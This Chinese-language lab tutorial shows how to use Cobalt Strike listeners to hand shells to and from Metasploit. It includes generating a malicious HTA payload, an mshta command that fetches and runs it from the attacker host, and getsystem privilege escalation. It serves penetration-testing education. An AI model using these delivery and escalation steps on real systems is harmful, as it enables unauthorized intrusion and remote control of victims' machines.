您好,登錄后才能下訂單哦!
這篇文章主要介紹如何使用cobaltstrike接口傳遞msf中的shell,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!
Cobalt Strike 一款以Metasploit為基礎的GUI框架式滲透測試工具,集成了端口轉發、服務掃描,自動化溢出,多模式端口監聽,exe、powershell木馬生成等。功能挺多,文章只是講了工具的核心功能
滲透機:kali,靶機:ws08。
kali:172.16.1.34
ws08:172.16.1.24
agscript 拓展應用的腳本
clint 檢查profile的錯誤信息
teamserver 服務端程序
cobaltstrike 客戶端程序
cobaltstrike.jar(java跨平臺)客戶端
logs 目錄記錄與目標主機的信息
third-party 第三方工具
啟動服務器
執行./teamserver 172.16.1.34 p@ssw0rd
不要關閉窗口,然后本機啟動cobalt strike連接測試客戶端連接
枚舉用戶
用戶通信
/msg Ro0t xxxxxx
上面是啟動和操作方法,下面看下cobaltstrike監聽模塊
Beacon為cs內置監聽器,需要在目標機上執行相應的payload,獲取shell到cs中。包含了smb,DNS, HTTP等模塊
=============================================================
windows/beacon_http/reverse_dns_txt
windows/beacon_http/reverse_http x86/x64
模塊有很多,這里不列舉了
foreigh為與外部相結合的監聽器,主要用于msf結合,比如獲取meterpreter到shell中
=============================================================
在cobalt strike中添加一個Listener,創建beacon Listener
創建Foreign Listener
save,在主配置菜單中依次點擊,Attack,packages,HTML Application
選擇Listener生成與方法,有powershell,vba以及exe三種可執行文件
選擇ps,保存到桌面上、
依次點擊Attacks,webdirve-by,hostfile、通過web服務打開連接通道
然后再彈出的窗口中找到文件一欄,點擊文件夾按鈕,找到需要添加的惡意腳本.hta、添加完后點擊launch啟動web服務模塊
此時我們查看日志信息提示我們在靶機客戶端訪問連鏈接
回到靶機,打開終端使用命令mshta.exe http://172.16.1.34:80/download/file.txt命令
kali查看,新連接已經建立起來了
默認情況下此處鏈接有60s的心跳線,為避免流量過大可以適當調整間隔。
右擊會話選擇interact打開交互會話終端
可以查看下當前權限,可以使用getsystem提權試試。
打開一個新的終端,進入msf設置一個監聽載荷,lhost設置成本地ip,然后expliit -j
回到cobalt里,右擊spawn生成新的listener。然后在彈出的窗口中點擊add添加一個新監聽器
此時監聽設置完,然后進入msf終端來傳遞cobaltstrike的shell
回到msf可以發現已經和靶機建立起了會話
以上是“如何使用cobaltstrike接口傳遞msf中的shell”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注億速云行業資訊頻道!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。